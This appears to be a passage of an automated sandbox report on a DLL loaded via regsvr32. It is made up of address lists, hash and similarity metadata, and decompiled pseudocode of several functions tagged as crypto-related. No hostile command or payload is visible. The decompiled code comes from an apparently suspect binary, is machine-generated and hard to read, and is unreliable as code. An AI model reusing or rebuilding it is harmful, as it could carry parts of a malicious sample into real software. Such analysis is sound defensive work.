                                                                                                              0x18004dcd3
                                                                                                              0x18004dcd8
                                                                                                              0x18004dce2
                                                                                                              0x18004dceb
                                                                                                              0x18004dcf0
                                                                                                              0x18004dcf2
                                                                                                              0x18004dcf5
                                                                                                              0x18004dcf8
                                                                                                              0x18004dcfe
                                                                                                              0x18004dd1d
                                                                                                              0x18004dd22
                                                                                                              0x18004dd29
                                                                                                              0x18004dd33
                                                                                                              0x18004dd38
                                                                                                              0x18004dd3d
                                                                                                              0x18004dd40
                                                                                                              0x18004dd49
                                                                                                              0x18004dd54
                                                                                                              0x18004dd56
                                                                                                              0x18004dd59
                                                                                                              0x18004dd5f
                                                                                                              0x18004dd71
                                                                                                              0x18004dd7d
                                                                                                              0x18004dd82
                                                                                                              0x18004dd89
                                                                                                              0x18004dd8f
                                                                                                              0x18004dd94
                                                                                                              0x18004dd98
                                                                                                              0x18004dd9a
                                                                                                              0x18004dd9f
                                                                                                              0x18004dda1
                                                                                                              0x18004dda4
                                                                                                              0x18004ddb2
                                                                                                              0x18004ddc1
                                                                                                              0x18004ddc6
                                                                                                              0x18004ddd2
                                                                                                              0x18004ddd7
                                                                                                              0x18004dddd
                                                                                                              0x18004dde5
                                                                                                              0x18004ddef
                                                                                                              0x18004ddf5
                                                                                                              0x18004ddf8
                                                                                                              0x18004ddfe
                                                                                                              0x18004de13
                                                                                                              0x18004de22
                                                                                                              0x18004de27
                                                                                                              0x18004de30
                                                                                                              0x18004de38
                                                                                                              0x18004de40
                                                                                                              0x18004de46
                                                                                                              0x18004de48
                                                                                                              0x18004de4b
                                                                                                              0x18004de59
                                                                                                              0x18004de6c
                                                                                                              0x18004de71
                                                                                                              0x18004de75
                                                                                                              0x18004de77
                                                                                                              0x18004de79
                                                                                                              0x18004de7e
                                                                                                              0x18004de82
                                                                                                              0x18004de89
                                                                                                              0x18004de8d
                                                                                                              0x18004de91
                                                                                                              0x18004de99
                                                                                                              0x18004dea0
                                                                                                              0x18004dea2
                                                                                                              0x18004dea9
                                                                                                              0x18004deb1
                                                                                                              0x18004deb5
                                                                                                              0x18004deb8
                                                                                                              0x18004debe
                                                                                                              0x18004dec4
                                                                                                              0x18004deca
                                                                                                              0x18004ded2
                                                                                                              0x18004ded8
                                                                                                              0x18004dedb
                                                                                                              0x18004dee1
                                                                                                              0x18004def8
                                                                                                              0x18004df03
                                                                                                              0x18004df08
                                                                                                              0x18004df0f
                                                                                                              0x18004df15
                                                                                                              0x18004df1a
                                                                                                              0x18004df1e
                                                                                                              0x18004df20
                                                                                                              0x18004df23
                                                                                                              0x18004df31
                                                                                                              0x18004df40
                                                                                                              0x18004df45
                                                                                                              0x18004df4c
                                                                                                              0x18004df51
                                                                                                              0x18004df56
                                                                                                              0x18004df5c
                                                                                                              0x18004df5f
                                                                                                              0x18004df7a
                                                                                                              0x18004df7d
                                                                                                              0x18004df81
                                                                                                              0x18004df87
                                                                                                              0x18004df8c
                                                                                                              0x18004df8e
                                                                                                              0x18004df91
                                                                                                              0x18004df96
                                                                                                              0x18004df99
                                                                                                              0x18004df9c
                                                                                                              0x18004dfa2
                                                                                                              0x18004dfa7
                                                                                                              0x18004dfad
                                                                                                              0x18004dfb1
                                                                                                              0x18004dfb7
                                                                                                              0x18004dfbd
                                                                                                              0x18004dfc2
                                                                                                              0x18004dfc8
                                                                                                              0x18004dfcd
                                                                                                              0x18004dfd3
                                                                                                              0x18004e000

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                              • String ID: s
                                                                                                              • API String ID: 1759834784-453955339
                                                                                                              • Opcode ID: 091bf0aaddba807e11e26974d496c7dd70f41b9b4737f528018e5087ffde1a81
                                                                                                              • Instruction ID: 32aa0032ce6252a5929b45d789271142be84ca4526266c0580a2d86bf78e9e84
                                                                                                              • Opcode Fuzzy Hash: 091bf0aaddba807e11e26974d496c7dd70f41b9b4737f528018e5087ffde1a81
                                                                                                              • Instruction Fuzzy Hash: 0CA2D0B261458C8BE7B68E29E5807DD7791F39C7CCF519116EB0667B98DB38CB088B04
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004EBA0 Relevance: 15.4, APIs: 10, Instructions: 371COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 85%
                                                                                                              			E0000000118004EBA0(signed int __edx, long long __rbx, signed int __rcx) {
				void* __rsi;
				unsigned int _t127;
				void* _t142;
				void* _t168;
				unsigned int _t175;
				unsigned int _t184;
				unsigned int _t195;
				intOrPtr _t199;
				unsigned int _t201;
				void* _t219;
				signed long long _t237;
				signed long long _t238;
				signed long long _t241;
				signed long long _t254;
				signed long long _t262;
				signed long long _t268;
				void* _t274;
				signed long long _t276;
				signed long long _t278;
				void* _t281;
				void* _t282;
				void* _t284;
				signed long long _t285;
				signed long long _t297;
				signed long long _t300;
				void* _t304;
				signed long long _t306;
				signed long long _t311;
				void* _t312;
				void* _t316;
				void* _t318;
				void* _t321;
				signed long long _t322;

				 *((long long*)(_t284 + 0x18)) = __rbx;
				_t282 = _t284 - 0x4c0;
				_t285 = _t284 - 0x5c0;
				_t237 =  *0x80070098; // 0xde2ac6aee6eb
				_t238 = _t237 ^ _t285;
				 *(_t282 + 0x4b0) = _t238;
				r8d = __edx;
				 *(_t285 + 0x2c) = __edx;
				r12d = 0;
				_t127 = 0xcccccccd * __edx >> 0x20 >> 3;
				 *(_t285 + 0x28) = _t127;
				r15d = _t127;
				 *(_t285 + 0x20) = _t127;
				if (_t127 == 0) goto 0x8004f020;
				r13d = r15d;
				r13d =  >  ? 0x26 : r13d;
				 *(_t285 + 0x24) = r13d;
				_t276 = 0x634d0 + _t238 * 4 + 0x180000000;
				 *(_t282 + 0x2e0) = _t278 + __rcx;
				E000000011800046A0(_t278 + __rcx, 0, _t282 + 0x2e4, 0x180000000, __rcx * 4);
				_t279 = _t278 << 2;
				_t262 = 0x180062bc0 + _t238 * 4;
				E00000001180003FF0();
				if ( *(_t282 + 0x2e0) - 1 > 0) goto 0x8004ed58;
				if ( *((intOrPtr*)(_t282 + 0x2e4)) != 0) goto 0x8004ecc6;
				 *(_t282 + 0x110) = r12d;
				r9d = 0;
				 *__rcx = r12d;
				E0000000118005053C(_t238, __rcx * 4, __rcx + 4, _t262, _t278 << 2, _t282 + 0x114, _t304, _t321);
				goto 0x8004efee;
				if (1 == 1) goto 0x8004efee;
				r10d =  *__rcx;
				if (r10d != 0) goto 0x8004ecde;
				goto 0x8004efee;
				r8d = r12d;
				r9d = r12d;
				_t241 = _t238;
				r9d = r9d + 1;
				_t264 = _t262 * _t241 + _t238;
				if (r9d != r10d) goto 0x8004ecf0;
				if (r8d == 0) goto 0x8004ecbf;
				if ( *__rcx - 0x73 >= 0) goto 0x8004ed32;
				 *(__rcx + 4 + _t238 * 4) = r8d;
				 *__rcx =  *__rcx + 1;
				goto 0x8004efee;
				r9d = 0;
				 *(_t282 + 0x2e0) = r12d;
				 *__rcx = r12d;
				_t142 = E0000000118005053C(_t238, _t241, __rcx + 4, _t262 * _t241 + _t238, _t278 << 2, _t282 + 0x2e4, _t304, _t318);
				goto 0x8004efec;
				_t201 =  *__rcx;
				_t322 = __rcx + 4;
				if (_t201 - 1 > 0) goto 0x8004ee44;
				_t168 =  *_t322;
				 *__rcx = _t142;
				_t306 = _t238 << 2;
				E0000000118005053C(_t238, _t241, _t322, _t262 * _t241 + _t238, _t278 << 2, _t282 + 0x2e4, _t306, _t316);
				if (_t168 != 0) goto 0x8004edba;
				r9d = 0;
				 *(_t282 + 0x2e0) = r12d;
				 *__rcx = r12d;
				E0000000118005053C(_t238, _t241, _t322, _t262 * _t241 + _t238, _t278 << 2, _t282 + 0x2e4, _t306, _t312);
				r15d =  *(_t285 + 0x20);
				goto 0x8004efee;
				if (_t168 == 1) goto 0x8004edae;
				r10d =  *__rcx;
				if (r10d == 0) goto 0x8004edae;
				r8d = r12d;
				r9d = r12d;
				_t311 = _t241;
				r9d = r9d + 1;
				if (r9d != r10d) goto 0x8004edd0;
				if (r8d == 0) goto 0x8004edae;
				if ( *__rcx - 0x73 >= 0) goto 0x8004ee17;
				r15d =  *(_t285 + 0x20);
				 *(__rcx + 4 + _t238 * 4) = r8d;
				 *__rcx =  *__rcx + 1;
				goto 0x8004efee;
				r9d = 0;
				 *(_t282 + 0x2e0) = r12d;
				_t297 = _t282 + 0x2e4;
				 *__rcx = r12d;
				_t254 = _t322;
				E0000000118005053C(_t238, _t241, _t254, _t264 * _t311 + _t238, _t279, _t297, _t306, _t274);
				r15d =  *(_t285 + 0x20);
				goto 0x8004efee;
				_t219 = 0 - _t201;
				if (_t219 < 0) goto 0x8004ee55;
				_t268 = _t322;
				 *(_t285 + 0x30) = _t268;
				if (( *(_t276 + 2) & 0 | _t219 > 0x00000000) == 0) goto 0x8004ee77;
				 *(_t282 + 0x110) = r12d;
				r13d = 0;
				if (0 == 0) goto 0x8004ef93;
				goto 0x8004ee8b;
				r13d = _t201;
				 *(_t282 + 0x110) = 0;
				_t199 =  *((intOrPtr*)(_t268 + _t241 * 4));
				if (_t199 != 0) goto 0x8004eeb4;
				if (0 != 0) goto 0x8004ef88;
				_t67 = _t241 + 1; // 0x1
				_t175 = _t67;
				 *((intOrPtr*)(_t282 + 0x114 + _t241 * 4)) = _t199;
				 *(_t282 + 0x110) = _t175;
				goto 0x8004ef88;
				r10d = 0;
				if (0 == 0) goto 0x8004ef7e;
				r11d = 0;
				r11d =  ~r11d;
				if (0 == 0x73) goto 0x8004ef24;
				r9d = 0;
				if (0 != _t175) goto 0x8004eee8;
				_t72 = _t238 + 1; // 0x1
				 *(_t282 + 0x114 + _t306 * 4) = 0;
				 *(_t282 + 0x110) = _t72;
				r8d =  *(_t282 + 0x2e4 + _t254 * 4);
				_t300 = _t297 * _t276 + _t254 + _t254;
				 *(_t282 + 0x114 + _t306 * 4) = r8d;
				if (_t311 + _t238 != 0) goto 0x8004eec7;
				if (r10d == 0) goto 0x8004ef7e;
				if (1 == 0x73) goto 0x8004efc2;
				r8d = 1;
				if (1 !=  *(_t282 + 0x110)) goto 0x8004ef55;
				_t88 = _t238 + 1; // 0x1
				 *(_t282 + 0x114 + _t300 * 4) = 0;
				 *(_t282 + 0x110) = _t88;
				_t195 =  *(_t282 + 0x114 + _t300 * 4);
				 *(_t282 + 0x114 + _t300 * 4) = _t195;
				_t184 =  *(_t282 + 0x110);
				r10d = _t195;
				if (_t195 != 0) goto 0x8004ef30;
				if (2 == 0x73) goto 0x8004efc2;
				if (1 != r13d) goto 0x8004ee90;
				r9d = _t184;
				 *__rcx = _t184;
				E0000000118005053C(_t238, _t241, _t322,  *(_t285 + 0x30), _t279, _t282 + 0x114, _t306 << 2, _t278);
				r15d =  *(_t285 + 0x20);
				r13d =  *(_t285 + 0x24);
				r12d = 0;
				goto 0x8004efee;
				r12d = 0;
				r9d = 0;
				 *(_t285 + 0x40) = r12d;
				 *__rcx = r12d;
				E0000000118005053C(_t238, _t241, _t322,  *(_t285 + 0x30), _t279, _t285 + 0x44, _t306 << 2, _t281);
				r15d =  *(_t285 + 0x20);
				r13d =  *(_t285 + 0x24);
				if (0 == 0) goto 0x8004f083;
				r15d = r15d - r13d;
				 *(_t285 + 0x20) = r15d;
				if (0 != 0) goto 0x8004ec10;
				r8d =  *(_t285 + 0x2c);
				r8d = r8d - _t238 + _t238 * 4 + _t238 + _t238 * 4;
				if (0 == 0) goto 0x8004f057;
				if ( *((intOrPtr*)(0x180000000 + 0x63568 + _t238 * 4)) != 0) goto 0x8004f0a5;
				 *(_t285 + 0x40) = r12d;
				r9d = 0;
				 *__rcx = r12d;
				E0000000118005053C(_t238, _t241, __rcx + 4, 0x180000000, _t279, _t285 + 0x44, _t306 << 2);
				return E000000011800028F0(1, _t184,  *(_t282 + 0x4b0) ^ _t285);
			}




































                                                                                                              0x18004eba0
                                                                                                              0x18004ebb0
                                                                                                              0x18004ebb8
                                                                                                              0x18004ebbf
                                                                                                              0x18004ebc6
                                                                                                              0x18004ebc9
                                                                                                              0x18004ebd0
                                                                                                              0x18004ebd3
                                                                                                              0x18004ebdc
                                                                                                              0x18004ebed
                                                                                                              0x18004ebf0
                                                                                                              0x18004ebf4
                                                                                                              0x18004ebf7
                                                                                                              0x18004ebfd
                                                                                                              0x18004ec14
                                                                                                              0x18004ec17
                                                                                                              0x18004ec1b
                                                                                                              0x18004ec2c
                                                                                                              0x18004ec4e
                                                                                                              0x18004ec54
                                                                                                              0x18004ec6a
                                                                                                              0x18004ec7b
                                                                                                              0x18004ec7f
                                                                                                              0x18004ec8d
                                                                                                              0x18004ec9b
                                                                                                              0x18004eca1
                                                                                                              0x18004eca8
                                                                                                              0x18004ecab
                                                                                                              0x18004ecba
                                                                                                              0x18004ecc1
                                                                                                              0x18004ecc9
                                                                                                              0x18004eccf
                                                                                                              0x18004ecd5
                                                                                                              0x18004ecd9
                                                                                                              0x18004ece2
                                                                                                              0x18004ece5
                                                                                                              0x18004ece8
                                                                                                              0x18004ecf3
                                                                                                              0x18004ed05
                                                                                                              0x18004ed14
                                                                                                              0x18004ed19
                                                                                                              0x18004ed21
                                                                                                              0x18004ed23
                                                                                                              0x18004ed2a
                                                                                                              0x18004ed2d
                                                                                                              0x18004ed32
                                                                                                              0x18004ed35
                                                                                                              0x18004ed43
                                                                                                              0x18004ed4e
                                                                                                              0x18004ed53
                                                                                                              0x18004ed58
                                                                                                              0x18004ed5b
                                                                                                              0x18004ed62
                                                                                                              0x18004ed68
                                                                                                              0x18004ed75
                                                                                                              0x18004ed78
                                                                                                              0x18004ed84
                                                                                                              0x18004ed8b
                                                                                                              0x18004ed8d
                                                                                                              0x18004ed90
                                                                                                              0x18004ed9e
                                                                                                              0x18004eda9
                                                                                                              0x18004edae
                                                                                                              0x18004edb5
                                                                                                              0x18004edbd
                                                                                                              0x18004edbf
                                                                                                              0x18004edc5
                                                                                                              0x18004edc7
                                                                                                              0x18004edca
                                                                                                              0x18004edcd
                                                                                                              0x18004edd3
                                                                                                              0x18004edf4
                                                                                                              0x18004edf9
                                                                                                              0x18004ee01
                                                                                                              0x18004ee03
                                                                                                              0x18004ee08
                                                                                                              0x18004ee0f
                                                                                                              0x18004ee12
                                                                                                              0x18004ee17
                                                                                                              0x18004ee1a
                                                                                                              0x18004ee21
                                                                                                              0x18004ee28
                                                                                                              0x18004ee30
                                                                                                              0x18004ee33
                                                                                                              0x18004ee38
                                                                                                              0x18004ee3f
                                                                                                              0x18004ee44
                                                                                                              0x18004ee50
                                                                                                              0x18004ee52
                                                                                                              0x18004ee55
                                                                                                              0x18004ee5c
                                                                                                              0x18004ee64
                                                                                                              0x18004ee6a
                                                                                                              0x18004ee6f
                                                                                                              0x18004ee75
                                                                                                              0x18004ee80
                                                                                                              0x18004ee83
                                                                                                              0x18004ee90
                                                                                                              0x18004ee95
                                                                                                              0x18004ee99
                                                                                                              0x18004ee9f
                                                                                                              0x18004ee9f
                                                                                                              0x18004eea2
                                                                                                              0x18004eea9
                                                                                                              0x18004eeaf
                                                                                                              0x18004eeb4
                                                                                                              0x18004eebb
                                                                                                              0x18004eec1
                                                                                                              0x18004eec4
                                                                                                              0x18004eeca
                                                                                                              0x18004eecc
                                                                                                              0x18004eed1
                                                                                                              0x18004eed3
                                                                                                              0x18004eed6
                                                                                                              0x18004eee2
                                                                                                              0x18004eeee
                                                                                                              0x18004ef04
                                                                                                              0x18004ef0e
                                                                                                              0x18004ef22
                                                                                                              0x18004ef27
                                                                                                              0x18004ef33
                                                                                                              0x18004ef39
                                                                                                              0x18004ef3e
                                                                                                              0x18004ef40
                                                                                                              0x18004ef43
                                                                                                              0x18004ef4f
                                                                                                              0x18004ef55
                                                                                                              0x18004ef65
                                                                                                              0x18004ef6d
                                                                                                              0x18004ef77
                                                                                                              0x18004ef7c
                                                                                                              0x18004ef81
                                                                                                              0x18004ef8d
                                                                                                              0x18004ef93
                                                                                                              0x18004ef9d
                                                                                                              0x18004efac
                                                                                                              0x18004efb1
                                                                                                              0x18004efb8
                                                                                                              0x18004efbd
                                                                                                              0x18004efc0
                                                                                                              0x18004efc2
                                                                                                              0x18004efca
                                                                                                              0x18004efcd
                                                                                                              0x18004efd7
                                                                                                              0x18004efdd
                                                                                                              0x18004efe2
                                                                                                              0x18004efe7
                                                                                                              0x18004eff0
                                                                                                              0x18004eff6
                                                                                                              0x18004f000
                                                                                                              0x18004f00a
                                                                                                              0x18004f01b
                                                                                                              0x18004f025
                                                                                                              0x18004f028
                                                                                                              0x18004f037
                                                                                                              0x18004f03d
                                                                                                              0x18004f042
                                                                                                              0x18004f045
                                                                                                              0x18004f052
                                                                                                              0x18004f082

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 1502251526-0
                                                                                                              • Opcode ID: 160cb99277df454bd72f9a32923aea7ef305dfa1e6ceb021dfa8ae0ab30364ad
                                                                                                              • Instruction ID: a2fc928d0e72bde2e4f36c74fcdfb140851dd5ce67eb31e174d77331f4458554
                                                                                                              • Opcode Fuzzy Hash: 160cb99277df454bd72f9a32923aea7ef305dfa1e6ceb021dfa8ae0ab30364ad
                                                                                                              • Instruction Fuzzy Hash: 9EE19E72204AC88AE7B6CF15D484BEA77A4F34E7CCF519426EA0947B84DB35CA49CB44
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800427CC Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 461COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 47%
                                                                                                              			E000000011800427CC(void* __ecx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, signed long long* __rdx, void* __r8, long long _a8, long long _a16, intOrPtr _a18, signed long long _a24, long long _a32) {
				signed long long _v72;
				intOrPtr _v80;
				intOrPtr* _v88;
				void* __rsi;
				void* _t31;
				void* _t32;
				signed long long* _t43;
				intOrPtr _t74;
				intOrPtr* _t76;
				void* _t77;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr* _t88;
				signed long long _t89;
				intOrPtr* _t90;
				void* _t99;
				long long _t103;
				signed long long _t111;
				intOrPtr* _t117;
				intOrPtr* _t118;
				intOrPtr* _t119;
				intOrPtr _t120;
				signed long long _t131;
				long long _t133;
				signed long long _t139;
				intOrPtr* _t140;
				signed long long _t142;

				_a8 = __rbx;
				r15d = 0;
				if (__rdx != 0) goto 0x80042808;
				0x80013b18();
				_t43 =  &(__rdx[2]);
				 *__rax = _t43;
				0x80013928();
				goto 0x800429df;
				asm("xorps xmm0, xmm0");
				 *__rdx = _t142;
				_t74 =  *__rcx;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = _t142;
				if (_t74 == 0) goto 0x800428c0;
				_a16 = 0x3f2a;
				_a18 = r15b;
				E000000011800527A0();
				if (_t74 != 0) goto 0x8004287d;
				r8d = 0;
				0x80042e00();
				if (_t43 == 0) goto 0x8004288f;
				_t117 = _v88;
				_t82 = _t117;
				if (_t117 == _v80) goto 0x80042943;
				_t31 = E0000000118003F8F4(_t74,  *_t82);
				if (_t82 + 8 != _v80) goto 0x80042866;
				goto 0x80042943;
				0x80043114();
				if (_t31 != 0) goto 0x80042898;
				goto 0x8004281a;
				_t118 = _v88;
				_t85 = _t118;
				if (_t118 == _v80) goto 0x80042943;
				_t32 = E0000000118003F8F4( *((intOrPtr*)(_t82 + 0x10)),  *_t85);
				if (_t85 + 8 != _v80) goto 0x800428a9;
				goto 0x80042943;
				_t119 = _v88;
				_t120 = _v80;
				_t111 = _t142;
				_a24 = _t111;
				_t76 = _t119;
				_t139 = (_t120 - _t119 >> 3) + 1;
				if (_t119 == _t120) goto 0x8004290a;
				_t99 = (_t131 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *_t76 + _t99)) != r15b) goto 0x800428ee;
				_t77 = _t76 + 8;
				if (_t77 != _t120) goto 0x800428e8;
				_a24 = _t111 + 1 + _t99;
				r8d = 1;
				E0000000118003AC54(_t32, _t139, _t111 + 1 + _t99,  *_t76);
				if (_t77 != 0) goto 0x80042952;
				E0000000118003F8F4(_t77, _t139);
				_t88 = _t119;
				if (_t119 == _t120) goto 0x80042940;
				E0000000118003F8F4(_t77,  *_t88);
				_t89 = _t88 + 8;
				if (_t89 != _t120) goto 0x8004292f;
				E0000000118003F8F4(_t77, _t119);
				goto 0x800429df;
				_t103 = _t77 + _t139 * 8;
				_t140 = _t119;
				_a32 = _t103;
				_t133 = _t103;
				if (_t119 == _t120) goto 0x800429b1;
				_a16 = _t77 - _t119;
				if ( *((char*)( *_t140 + (_t142 | 0xffffffff) + 1)) != 0) goto 0x80042973;
				if (E00000001180052610(_t77 - _t119, _t89, _t133, _t103 - _t133 + _a24, _t120,  *_t140, (_t142 | 0xffffffff) + 2) != 0) goto 0x800429f7;
				 *((long long*)(_a16 + _t140)) = _t133;
				if (_t140 + 8 != _t120) goto 0x8004296c;
				 *__rdx = _t89;
				E0000000118003F8F4(_a16, _a32);
				_t90 = _t119;
				if (_t119 == _t120) goto 0x800429d5;
				E0000000118003F8F4(_a16,  *_t90);
				if (_t90 + 8 != _t120) goto 0x800429c4;
				E0000000118003F8F4(_a16, _t119);
				return 0;
			}






























                                                                                                              0x1800427cc
                                                                                                              0x1800427e3
                                                                                                              0x1800427ef
                                                                                                              0x1800427f1
                                                                                                              0x1800427f6
                                                                                                              0x1800427fa
                                                                                                              0x1800427fc
                                                                                                              0x180042803
                                                                                                              0x180042808
                                                                                                              0x18004280b
                                                                                                              0x18004280e
                                                                                                              0x180042811
                                                                                                              0x180042816
                                                                                                              0x18004281d
                                                                                                              0x180042827
                                                                                                              0x180042830
                                                                                                              0x180042834
                                                                                                              0x18004283f
                                                                                                              0x180042845
                                                                                                              0x18004284a
                                                                                                              0x180042853
                                                                                                              0x180042855
                                                                                                              0x180042859
                                                                                                              0x180042860
                                                                                                              0x180042869
                                                                                                              0x180042876
                                                                                                              0x180042878
                                                                                                              0x180042884
                                                                                                              0x18004288d
                                                                                                              0x180042896
                                                                                                              0x180042898
                                                                                                              0x18004289c
                                                                                                              0x1800428a3
                                                                                                              0x1800428ac
                                                                                                              0x1800428b9
                                                                                                              0x1800428bb
                                                                                                              0x1800428c0
                                                                                                              0x1800428c8
                                                                                                              0x1800428cc
                                                                                                              0x1800428d2
                                                                                                              0x1800428d9
                                                                                                              0x1800428e0
                                                                                                              0x1800428e6
                                                                                                              0x1800428ee
                                                                                                              0x1800428f5
                                                                                                              0x1800428fa
                                                                                                              0x180042904
                                                                                                              0x180042906
                                                                                                              0x18004290a
                                                                                                              0x180042913
                                                                                                              0x18004291e
                                                                                                              0x180042922
                                                                                                              0x180042927
                                                                                                              0x18004292d
                                                                                                              0x180042932
                                                                                                              0x180042937
                                                                                                              0x18004293e
                                                                                                              0x180042946
                                                                                                              0x18004294d
                                                                                                              0x180042952
                                                                                                              0x180042956
                                                                                                              0x180042959
                                                                                                              0x18004295d
                                                                                                              0x180042963
                                                                                                              0x180042968
                                                                                                              0x18004297b
                                                                                                              0x180042997
                                                                                                              0x1800429a1
                                                                                                              0x1800429af
                                                                                                              0x1800429b3
                                                                                                              0x1800429b7
                                                                                                              0x1800429bc
                                                                                                              0x1800429c2
                                                                                                              0x1800429c7
                                                                                                              0x1800429d3
                                                                                                              0x1800429d8
                                                                                                              0x1800429f6

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo$CurrentFeatureFileFindFirstPresentProcessProcessor
                                                                                                              • String ID: *?
                                                                                                              • API String ID: 1182102293-2564092906
                                                                                                              • Opcode ID: 09c4c5ac1566981091877ec3f62f0a2c22e35fbe740cbf6310a3d14b663fd6da
                                                                                                              • Instruction ID: c5d54596b75f223bbe08b69dddbcda8a1d656c5783ba2cb6e6569f48f3cd91ba
                                                                                                              • Opcode Fuzzy Hash: 09c4c5ac1566981091877ec3f62f0a2c22e35fbe740cbf6310a3d14b663fd6da
                                                                                                              • Instruction Fuzzy Hash: 4502C332714B9841EBA6DB26D9803ED6791E74CBE8F968112FE4907BC9DF38C649C304
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180058338 Relevance: 10.8, APIs: 7, Instructions: 286COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID:
                                                                                                              • API String ID: 3215553584-0
                                                                                                              • Opcode ID: f7b281e7880efbc9fbc0fd386ef7b3360c19bad19889c74de4309e980d3a8b13
                                                                                                              • Instruction ID: 2814f3e28117e054f9dff1cb60eb4dcec00e43b7b035d8d5da3b39219df05ba9
                                                                                                              • Opcode Fuzzy Hash: f7b281e7880efbc9fbc0fd386ef7b3360c19bad19889c74de4309e980d3a8b13
                                                                                                              • Instruction Fuzzy Hash: 47C1F272208A8D9AE7E39B1594413EE6BA0FB48BC0F458101FE6A277D1DF7AC65CD701
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004E6F0 Relevance: 10.7, APIs: 7, Instructions: 249COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 73%
                                                                                                              			E0000000118004E6F0(intOrPtr* __rcx, signed long long __rdx, signed int __r9, signed int __r11, long long __r13, long long __r14, long long __r15) {
				void* __rbx;
				void* __rsi;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t127;
				intOrPtr _t135;
				signed long long _t170;
				signed long long _t171;
				void* _t172;
				signed long long _t173;
				intOrPtr* _t175;
				signed long long _t177;
				signed long long _t181;
				signed long long _t186;
				signed long long _t188;
				void* _t190;
				signed long long _t193;
				void* _t195;
				void* _t196;
				signed long long _t197;
				long long _t210;
				signed long long _t214;
				long long _t223;

				_t186 = __rdx;
				_t195 = _t196 - 0x2f0;
				_t197 = _t196 - 0x3f0;
				_t170 =  *0x80070098; // 0xde2ac6aee6eb
